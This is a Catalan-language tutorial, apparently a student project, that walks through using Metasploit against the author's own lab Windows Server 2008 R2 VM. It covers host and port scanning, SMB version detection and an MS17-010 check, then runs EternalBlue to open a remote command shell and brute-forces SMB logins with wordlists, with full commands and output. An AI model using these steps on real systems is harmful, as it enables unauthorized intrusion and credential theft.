## 0. Què és i com funciona Metasploit:

### 0.1. Presentació del projecte:

En aquest projecte veurem com funciona Metasploit i l'utilitzarem per atacar una màquina pròpia aprofitant les seves vulnerabilitats que descobrirem. També veurem com obtenir accés i extreure informació de la màquina que estem atacant, i finalment, mirar com podem reforçar les vulnerabilitats de la nostra màquina per tal de millorar la seva seguretat.


### 0.2. Què és metasploit?

Metasploit és un entorn de treball de codi obert que proporciona informació sobre les vulnerabilitats d'un sistema. És una eina que automatitza diverses tasques, ja que permet recollir informació, obtenir accés al sistema, evitar ser detectats i tot amb el mateix programa. També facilita bastant els tests de penetració i el desenvolupament de signatures per als sistemes de detecció d'intrusos. Metasploit té diferents versions, però la que utilitzarem nosaltres en aquest cas és el Metasploit Framework.

### 0.3. Com funciona?

Metasploit funciona amb una base de dades PostgreSQL. Dins aquesta base de dades, es poden crear diferents "workspaces", ja que d'aquesta manera evitarem barrejar dades de diferents proves o projectes. Dins aquests espais de treball o "workspaces", es guardarà tota la informació que extraurem utilitzant els exploits.

Un exploit és un fragment de codi o un conjunt de comandes que s'utilitza per "explotar" o aprofitar una vulnerabilitat de seguretat dins un sistema.

Abans d'utilitzar aquests exploits, hem de carregar prèviament uns mòduls. Aquests mòduls són un conjunt de codi que ens permetrà executar els exploits, tot i que també podrem configurar alguns dels camps d'aquestes mòduls.

### 0.4. Instal·lació de Metasploit

Primer de tot instal·larem metasploit, i anirem veient com funciona a mesura que trobem les seves diferents parts. Per instal·lar Metasploit utilitzem la següent ordre:

```
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
```

Una vegada ja tenim instal·lat Metasploit, veurem que s'han afegit també una sèrie de comandes com per exemple msfconsole o msfdb. Aquestes són les comandes que utilitzarem per fer servir Metasploit.  

- Primer de tot executarem la comanda ```msfdb init```. Això inicialitzarà la base de dades de metasploit:

	```
	kali@kali:~$ sudo msfdb init
	[sudo] password for kali: 
	[+] Starting database
	[+] Creating database user 'msf'
	[+] Creating databases 'msf'
	[+] Creating databases 'msf_test'
	[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
	[+] Creating initial database schema
	```

- Un cop ja tenim creada la base de dades, ja podem accedir a la consola. Per accedir a la consola de Metasploit, utilitzarem l'ordre ```msfconsole```.

	Una vegada estem dins la consola de metasploit (veurem que ha canviat el prompt), podem utilitzar la comanda ```help``` per veure un llistat de les comandes que es poden fer servir dins la consola. A continuació hi ha una llista amb les ordres més rellevants:

	- search: Podem utilitzar aquesta ordre per buscar els mòduls que haurem de carregar posteriorment.
	- use: Utilitzarem aquesta comanda per carregar els mòduls.
	- show options: Aquesta comanda ens permetrà veure les opcions del mòdul que hem carregat. També indica quines de les opcions són obligatòries i inclou una petita descripció.
	- set: Amb aquesta ordre podem establir les variables de les opcions esmentades a l'anterior línia.
	- db_connect: S'utilitza per connectar-nos a una base de dades. Si hem seguit l'ordre d'aquest document s'hauria de connectar automàticament a la base de dades que hem creat prèviament.
	- db_status: Ens mostra l'estat actual de la base de dades.
	- workspace: Ens permet canviar entre els diferents espais de treball mencionats anteriorment. Si escrivim l'ordre sense cap opció ens mostra un llistat amb els diferents espais, amb l'opció ```-a``` podem afegir un espai nou i si indiquem el nom de l'espai tot seguit de l'ordre canviarem a l'espai de treball.

En el següent fitxer començarem a veure com descobrir dispositius: [1.Descobrir dispositius](./1_descobrir_dispositius)


## 1. Descobrir els dispositius:

Primer de tot, dividirem aquesta fase del projecte en tres parts:

	1. IP scan
	2. Port scan
	3. Detecció de Sistema Operatiu i la seva versió

### 1.1. IP scan

 A la fase de IP scan el que farem és, carregant un dels mòduls que hem esmentat anteriorment, utilitzar un exploit que ens permeti veure quins dispositius hi ha connectats dins la nostra pròpia xarxa. Com que en aquest cas ja sabem quina és la màquina que planegem atacar, agafarem la seva IP de la llista que ens retorni l'exploit. Per tal de fer això haurem de carregar el mòdul "arp_sweep":

Primer de tot hem d'arrencar la consola amb permisos de root:

```
root@kali:~# msfconsole
                                                
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!

	=[ metasploit v5.0.71-dev                          ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > 
```

Amb la comanda "db_status" ens assegurem que estem connectats a la base de dades, ja que sinó no es guardarà la informació dels hosts que descobrim:

```
msf5 > db_status
[*] Connected to msf. Connection type: postgresql.
```

En el cas de que no estiguem connectats a la base de dades, podem utilitzar l'ordre "db_connect". També és pot consultar on es troba el fitxer de configuració de la base de dades amb l'ordre "msfdb status" a un terminal del sistema:

```
kali@kali:~$ sudo msfdb status
● postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
     Active: active (exited) since Sun 2020-05-10 10:42:58 EDT; 1min 46s ago
    Process: 5274 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
   Main PID: 5274 (code=exited, status=0/SUCCESS)

May 10 10:42:58 kali systemd[1]: Starting PostgreSQL RDBMS...
May 10 10:42:58 kali systemd[1]: Started PostgreSQL RDBMS.

COMMAND   PID     USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
postgres 5256 postgres    3u  IPv6  48747      0t0  TCP localhost:5432 (LISTEN)
postgres 5256 postgres    4u  IPv4  48748      0t0  TCP localhost:5432 (LISTEN)

UID          PID    PPID  C STIME TTY      STAT   TIME CMD
postgres    5256       1  0 10:42 ?        Ss     0:00 /usr/lib/postgresql/12/bin/postgres -D /var/lib/postgresql/12/main -c config_file=/etc/postgresql/12/main/postgresql.conf

[+] Detected configuration file (/usr/share/metasploit-framework/config/database.yml)
```


Una vegada ja tenim això, carreguem el mòdul "arp_sweep". Si coneixem la ruta, es pot escriure directament, però sinó podem utilitzar la comanda "search" per veure on podem trobar-la:

```
msf5 > search arp_sweep

Matching Modules
================

#  Name                                   Disclosure Date  Rank    Check  Description
-  ----                                   ---------------  ----    -----  -----------
0  auxiliary/scanner/discovery/arp_sweep                   normal  No     ARP Sweep Local Network Discovery
```

Com veiem a les línies anteriors, a l'apartat de "name" tenim la ruta completa on es troba aquest mòdul. També tenim a l'apartat "Description" una petita descripció del que fa aquest mòdul. Una vegada ja coneixem la ruta del mòdul el carreguem:

```
msf5 > use auxiliary/scanner/discovery/arp_sweep 
msf5 auxiliary(scanner/discovery/arp_sweep) > 
```
	
Per veure com hem de configurar aquest mòdul, primer hem de veure les seves opcions de configuració. Això ho podem fer amb la comanda "show options":

```
msf5 auxiliary(scanner/discovery/arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
INTERFACE                   no        The name of the interface
RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SHOST                       no        Source IP Address
SMAC                        no        Source MAC Address
THREADS    1                yes       The number of concurrent threads (max one per host)
TIMEOUT    5                yes       The number of seconds to wait for new data
```
	
Veurem que aquesta ordre ens retorna diverses coses: la primera es la columna "Name", el qual indica el nom de l'opció a configurar. Després tenim el camp "Current Setting", que ens mostra el valor o configuració actual que té aquell camp. El tercer camp és el "Required" i ens indica si és necessari que aquest camp tingui un valor per tal que funcioni l'exploit. I l'últim camp "Description" és una breu descripció de l'opció a configurar. En aquest cas ja tenim dues de les tres configuracions necessàries perquè l'exploit funcioni, de manera que només necessitem establir el valor de "RHOSTS", variable la qual fa referència a l'objectiu o rang d'objectius a atacar amb aquest exploit. Per establir el valor d'aquesta variable ho farem amb la comanda "set":

```
msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.0.0/24
rhosts => 192.168.0.0/24
```
En aquest cas, establim com a rhosts la nostra xarxa local, ja que el dispositiu que volem identificar es troba dins la mateixa xarxa.

Una vegada ja el tenim configurat, podem executar l'exploit amb la comanda "run" o "exploit":

```
msf5 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.0.1 appears to be up (UNKNOWN).
[+] 192.168.0.10 appears to be up (UNKNOWN).
[+] 192.168.0.11 appears to be up (UNKNOWN).
[+] 192.168.0.17 appears to be up (UNKNOWN).
[+] 192.168.0.21 appears to be up (CADMUS COMPUTER SYSTEMS).
[+] 192.168.0.22 appears to be up (UNKNOWN).
[+] 192.168.0.23 appears to be up (UNKNOWN).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```

Aquest exploit ens retorna una llista de les adreces ip que li han contestat al senyal ARP que ell ha enviat, per tant son IPs que estan actives.


Una altre manera d'escanejar els hosts de la nostra xarxa, pot ser amb l'ordre nmap:

```
msf5 > db_nmap -sP 192.168.0.0/24
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 13:28 EDT
[*] Nmap: Nmap scan report for 192.168.0.1
[*] Nmap: Host is up (0.0043s latency).
[*] Nmap: MAC Address: D0:57:94:78:A3:24 (Sagemcom Broadband SAS)
[*] Nmap: Nmap scan report for 192.168.0.10
[*] Nmap: Host is up (0.0042s latency).
[*] Nmap: MAC Address: D0:57:94:78:A3:25 (Sagemcom Broadband SAS)
[*] Nmap: Nmap scan report for 192.168.0.11
[*] Nmap: Host is up (0.00025s latency).
[*] Nmap: MAC Address: 74:D4:35:84:41:94 (Giga-byte Technology)
[*] Nmap: Nmap scan report for 192.168.0.17
[*] Nmap: Host is up (0.00031s latency).
[*] Nmap: MAC Address: B8:AE:ED:EB:2D:5A (Elitegroup Computer Systems)
[*] Nmap: Nmap scan report for 192.168.0.21
[*] Nmap: Host is up (0.0075s latency).
[*] Nmap: MAC Address: 08:00:27:97:EE:85 (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap scan report for 192.168.0.22
[*] Nmap: Host is up (0.00022s latency).
[*] Nmap: MAC Address: 30:9C:23:90:E0:DB (Micro-star Intl)
[*] Nmap: Nmap scan report for 192.168.0.23
[*] Nmap: Host is up (0.024s latency).
[*] Nmap: MAC Address: 0C:2F:B0:89:F9:3A (Unknown)
[*] Nmap: Nmap scan report for 192.168.0.19
[*] Nmap: Host is up.
[*] Nmap: Nmap done: 256 IP addresses (9 hosts up) scanned in 28.24 seconds
```

Per tal de poder veure aquesta informació que acabem de descobrir a la nostra base de dades, podem utilitzar la comanda "hosts":

```
msf5 auxiliary(scanner/discovery/arp_sweep) > hosts

Hosts
=====

address       mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------       ---                ----  -------  ---------  -----  -------  ----  --------
192.168.0.1   d0:57:94:78:a3:24                                                  
192.168.0.10  d0:57:94:78:a3:25                                                  
192.168.0.11  74:d4:35:84:41:94                                                  
192.168.0.17  b8:ae:ed:eb:2d:5a                                                  
192.168.0.21  08:00:27:f7:55:d2                                                  
192.168.0.22  0c:54:15:f5:5e:97                                                  
```

Com podem veure, tenim les adreces IP que hem trobat amb l'exploit d'abans, a més a més de la seva adreça mac.


### 1.2. Port scan

Una vegada ja tenim la adreça ip de la màquina que volem atacar, realitzarem un escaneig dels ports, per tal de veure quins són visibles o estan oberts. Això ho farem amb el mòdul "syn":

```
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/portscan/syn
```
Dins aquest modul hem d'establir la direcció ip del host:

```
msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.0.21
rhosts => 192.168.0.21
```
I després hem d'indicar quin port o quin rang de ports volem que miri. En aquest cas indicarem que busqui del port 1 al 10000, per tal d'obtenir més informació:

```
msf5 auxiliary(scanner/portscan/syn) > set ports 1-10000
ports => 1-10000
```

Un cop configurat, l'executem:

```
msf5 auxiliary(scanner/portscan/syn) > run

[+]  TCP OPEN 192.168.0.21:22
[+]  TCP OPEN 192.168.0.21:135
[+]  TCP OPEN 192.168.0.21:139
[+]  TCP OPEN 192.168.0.21:445
[+]  TCP OPEN 192.168.0.21:3389
[+]  TCP OPEN 192.168.0.21:5985
```

D'altra banda, podem executar la mateixa comanda amb nmap des de la mateixa consola de metasploit, per veure si els resultats són coincidents o si hi ha algun port que aparegui només en un dels dos escanejos. La comanda a executar per escanejar amb Nmap és la següent:

```
msf5 auxiliary(scanner/portscan/syn) > db_nmap 192.168.0.21
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 10:31 EDT
[*] Nmap: Nmap scan report for 192.168.0.21
[*] Nmap: Host is up (0.0049s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT      STATE SERVICE
[*] Nmap: 22/tcp    open  ssh
[*] Nmap: 135/tcp   open  msrpc
[*] Nmap: 139/tcp   open  netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds
[*] Nmap: 3389/tcp  open  ms-wbt-server
[*] Nmap: 49152/tcp open  unknown
[*] Nmap: 49153/tcp open  unknown
[*] Nmap: 49154/tcp open  unknown
[*] Nmap: 49155/tcp open  unknown
[*] Nmap: 49156/tcp open  unknown
[*] Nmap: 49157/tcp open  unknown
[*] Nmap: MAC Address: 08:00:27:F7:55:D2 (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 15.40 seconds
```

En aquest cas, la comanda amb nmap és més ràpida i alguns dels resultats si que són coincidents, encara que no apareixen tots els ports als dos resultats.

### 1.3. Detecció del sistema operatiu i la seva versió

Per tal d'esbrinar quin sistema operatiu i quina versió d'aquest utilitza la màquina que estem atacant, mirarem d'atacar el port 445. Aquest port pertany al protocol SMB (server Message Block). Aquest mètode només serà efectiu si durant l'escaneig de ports, el port 445 estava obert. Per atacar el port farem servir l'exploit "smb_version":

```
msf5 auxiliary(scanner/portscan/syn) > use auxiliary/scanner/smb/smb_version
```

Una vegada ja l'hem carregat, l'hem de configurar, indicant-l'hi quina és l'adreça IP a la que s'ha de connectar:

```
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.0.21
rhosts => 192.168.0.21
```

Un cop ja tenim el mòdul configurat, l'executem:
```
msf5 auxiliary(scanner/smb/smb_version) > run

[+] 192.168.0.21:445      - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:VAGRANT-2008R2) (workgroup:WORKGROUP ) (signatures:optional)
[*] 192.168.0.21:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Com podem veure, d'entre la informació que ens ha retornat tenim el sistema operatiu que utilitza (Windows 2008 R2 Stantdard SP1), la versió (Build:7601) i el hostname de la màquina (name:VAGRANT-2008R2).

Per acabar amb aquesta part, podem tornar a realitzar la comanda "hosts" per veure com s'ha actualitzat la informació:

```
msf5 auxiliary(scanner/smb/smb_version) > hosts

Hosts
=====

address       mac                name            os_name          os_flavor  os_sp  purpose  info  comments
-------       ---                ----            -------          ---------  -----  -------  ----  --------
192.168.0.1   d0:57:94:78:a3:24                                                                    
192.168.0.10  d0:57:94:78:a3:25                                                                    
192.168.0.11  74:d4:35:84:41:94                                                                    
192.168.0.17  b8:ae:ed:eb:2d:5a                                                                    
192.168.0.21  08:00:27:f7:55:d2  VAGRANT-2008R2  Windows 2008 R2  Standard   SP1    server         
192.168.0.22  0c:54:15:f5:5e:97
```

Com podem veure la informació ha canviat respecte a l'última vegada que vam revisar la base de dades. Ara a l'entrada del host que hem atacat al port 445 amb l'exploit anterior (192.168.0.21) té afegida la informació que hem extret, és a dir el hostname, sistema operatiu i també ens indica que és una màquina que fa la funció de client.

Finalment, també podem executar una sola consulta de nmap i podrem obtenir tota la informació anterior, a més a més de les versions de les aplicacions que utilitzen els ports:

```
msf5 auxiliary(scanner/smb/smb_version) > db_nmap -sS -sV -O 192.168.0.21
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 10:56 EDT
[*] Nmap: Nmap scan report for 192.168.0.21
[*] Nmap: Host is up (0.00090s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT      STATE SERVICE      VERSION
[*] Nmap: 22/tcp    open  ssh          OpenSSH 7.1 (protocol 2.0)
[*] Nmap: 135/tcp   open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp  open  tcpwrapped
[*] Nmap: 49152/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49155/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49156/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49157/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: MAC Address: 08:00:27:F7:55:D2 (Oracle VirtualBox virtual NIC)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows 7
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_7::sp1
[*] Nmap: OS details: Microsoft Windows 7 SP1
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 84.37 seconds
```

## 2. Accedir als dispositius descoberts:

### 2.1. Escaneig de vulnerabilitats

Abans d'accedir a la màquina que tenim per objectiu, hem d'identificar com ho podem fer o mitjançant quins ports o aplicacions és més convenient fer-ho. Per això primer revisem a la nostra base de dades quins ports o serveis tenim oberts a la màquina objectiu:

```
msf5 > services 192.168.0.21
Services
========

host          port   proto  name           state  info
----          ----   -----  ----           -----  ----
192.168.0.21  22     tcp    ssh            open   
192.168.0.21  135    tcp    msrpc          open   
192.168.0.21  139    tcp    http           open   
192.168.0.21  445    tcp    http           open   Windows 2008 R2 Standard SP1 (build:7601) (name:VAGRANT-2008R2) (workgroup:WORKGROUP ) (signatures:optional)
192.168.0.21  3389   tcp    ms-wbt-server  open   
192.168.0.21  49152  tcp    unknown        open   
192.168.0.21  49153  tcp    unknown        open   
192.168.0.21  49154  tcp    unknown        open   
192.168.0.21  49155  tcp    unknown        open   
192.168.0.21  49156  tcp    unknown        open   
192.168.0.21  49157  tcp    unknown        open   
```

En aquest cas, a part de veure que és una màquina Windows, veiem que alguns dels ports oberts són el 22 que pertany al servei SSH, el 139 i 445 que pertanyen al servei SMB, el 135 que pertany al msrpc, el 3389 que s'utilitza per a l'escriptori remot de Windows o el Terminal Server, i la resta que són ports dinàmics. Dels 3 primers serveis que hem pogut reconèixer, intentarem atacar el servei SMB pel port 445, ja que d'entre les opcions que tenim, sol ser el més fàcil.

Ara que ja hem decidit quin port atacarem, executarem primer de tot un escaneig amb nmap per trobar possibles vulnerabilitats al port 445:

```
msf5 > nmap --script smb-vuln* -p 445 192.168.0.21
[*] exec: nmap --script smb-vuln* -p 445 192.168.0.21

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 09:44 EDT
Nmap scan report for 192.168.0.21
Host is up (0.00049s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:F7:55:D2 (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 18.64 seconds
```

En el resultat de la comanda anterior, podem veure que s'ha trobat una vulnerabilitat en el port 445:

```
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
```

Com podem veure, ens diu que el port té la vulnerabilitat MS17-010.


### 2.2. Aprofitar les vulnerabilitats 

2.2.1. Ms-17-010:

Com hem vist a l'anterior punt, el port 445 té una vulnerabilitat. Per tant busquem primer de tot si a metasploit hi ha algun mòdul que pugui explotar aquesta vulnerabilitat:

```
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/doublepulsar_rce           2017-04-14       great    Yes    DOUBLEPULSAR Payload Execution and Neutralization
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
```

En aquest cas utilitzarem el mòdul "ms17_010_eternalblue". Aquest mòdul intentarà explotar aquesta vulnerabilitat, i crear una sessió a la màquina objectiu. Primer de tot carreguem el mòdul:

```
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > 
```

Un cop ja tenim carregat el mòdul el configurarem, primer de tot establint l'adreça ip de la màquina objectiu:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.0.21
rhosts => 192.168.0.21
```

I després establint quin objectiu (target) volem atacar amb la comanda "set target". En el cas que no sapiguem quins són els possibles objectius que podem atacar, podem veure-ho amb la comanda "show target" (encara que en aquest cas només tenim un sol objectiu escanejat i per tant no en trobarem més):

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set target 0
target => 0
```

Una vegada configurat el mòdul, ja el podem executar:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.0.19:4444 
[*] 192.168.0.21:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.21:445      - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.21:445      - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.21:445 - Connecting to target for exploitation.
[+] 192.168.0.21:445 - Connection established for exploitation.
[+] 192.168.0.21:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.21:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.0.21:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.0.21:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard 
[*] 192.168.0.21:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.0.21:445 - 0x00000030  6b 20 31                                         k 1             
[+] 192.168.0.21:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.21:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.21:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.21:445 - Starting non-paged pool grooming
[+] 192.168.0.21:445 - Sending SMBv2 buffers
[+] 192.168.0.21:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.21:445 - Sending final SMBv2 buffers.
[*] 192.168.0.21:445 - Sending last fragment of exploit packet!
[*] 192.168.0.21:445 - Receiving response from exploit packet
[+] 192.168.0.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.21:445 - Sending egg to corrupted connection.
[*] 192.168.0.21:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.21:49159) at 2020-05-02 08:49:38 -0400
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



C:\Windows\system32>
```

En el cas que hagi funcionat veurem una sortida com la del codi anterior. Per tant ara ja tenim una sessió creada a la màquina objectiu i per tant podem executar comandes:

```
C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::817f:cd48:d8cf:cdf7%11
   IPv4 Address. . . . . . . . . . . : 192.168.0.21
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.0.1

Tunnel adapter isatap.{2A2DD292-C661-4BC0-B831-EBB832B211F9}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>hostname
hostname
vagrant-2008R2
```

2.2.2. Atac de diccionari:

Si ens trobéssim en la situació en la qual l'anterior mètode no hagi funcionat, o no s'hagi pogut utilitzar perquè el host objectiu no tenia cap vulnerabilitat al port, sempre podem recórrer el mètode d'atac de diccionari. Aquest mètode consisteix a fer nombrosos intents d'inici de sessió fins que trobem la combinació correcta d'usuari i contrasenya. A més, hem de ser nosaltres qui li proporcioni al programa la llista d'usuaris i contrasenyes. Per tant podríem agafar unes llistes més grans d'usuaris i contrasenyes per tenir més probabilitats de tenir èxit amb aquest atac, encara que trigarà més, ja que les llistes són més extenses. O pel contrari agafar fitxers més petits perquè el procés sigui més ràpid i no trigui tant a acabar, però llavors tenim menys possibilitats que aquest atac funcioni, ja que la combinació d'usuari i contrasenya podria no estar en aquestes llistes. En aquest cas utilitzarem llistes bastant extenses, ja que encara que el procés sigui més llarg tindrem més probabilitats de tenir èxit.

També hem de tenir en compte que és un tipus d'atac més "sorollós", ja que els intents d'inici de sessió podem emmagatzemar-se en els logs del sistema i algú podria adonar-se'n del que intentem fer. En aquest cas no ens preocupa això, ja que estem atacant una màquina pròpia.

Per realitzar l'atac de diccionari, ho podem fer utilitzant un dels propis mòduls de metasploit, "smb_login":

```
msf5 > use auxiliary/scanner/smb/smb_login 
msf5 auxiliary(scanner/smb/smb_login) >
```

Si mirem les opcions d'aquest mòdul, veurem que té més variables que hem de definir abans de poder executar-lo. Les variables que definirem en aquest cas són les següents:
- RHOSTS: Adreça ip de la màquina objectiu
- USER_FILE: Fitxer que conté els usuaris amb els quals provarà a iniciar sessió
- PASS_FILE: Fitxer que conté les contrasenyes amb les quals intentarà iniciar sessió
- USER_AS_PASS: Amb aquesta variable indiquem que intenti iniciar sessió amb contrasenyes que siguin el mateix nom que el de l'usuari
- DB_ALL_USERS i DB_ALL_PASS: Amb aquesta variable emmagatzemarà els resultats a la base de dades
- VERBOSE: Aquesta opció ens mostra tots els intents que va fent (la deshabilitarem)

Els fitxers utilitzats com a llista d'usuaris i contrasenyes per a aquest cas es poden trobar dins el directori [dictionary-attack](.\dictionary-attack).

```
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.0.21
rhosts => 192.168.0.21
msf5 auxiliary(scanner/smb/smb_login) > set user_file /home/kali/Documents/m14-projecteasix/brute-force/users.txt
user_file => /home/kali/Documents/m14-projecteasix/brute-force/users.txt
msf5 auxiliary(scanner/smb/smb_login) > set pass_file /home/kali/Documents/m14-projecteasix/brute-force/passwords.txt
pass_file => /home/kali/Documents/m14-projecteasix/brute-force/passwords.txt
msf5 auxiliary(scanner/smb/smb_login) > set user_as_pass true
user_as_pass => true
smsf5 auxiliary(scanner/smb/smb_login) > set db_all_users true
db_all_users => true
msf5 auxiliary(scanner/smb/smb_login) > set db_all_pass true
db_all_pass => true
msf5 auxiliary(scanner/smb/smb_login) > set verbose false
verbose => false
```

Un cop està tot configurat executem l'exploit:

```
msf5 auxiliary(scanner/smb/smb_login) > run

[+] 192.168.0.21:445      - 192.168.0.21:445 - Success: '.\vagrant:vagrant' Administrator
[+] 192.168.0.21:445      - 192.168.0.21:445 - Success: '.\administrator:vagrant' Administrator
[*] 192.168.0.21:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
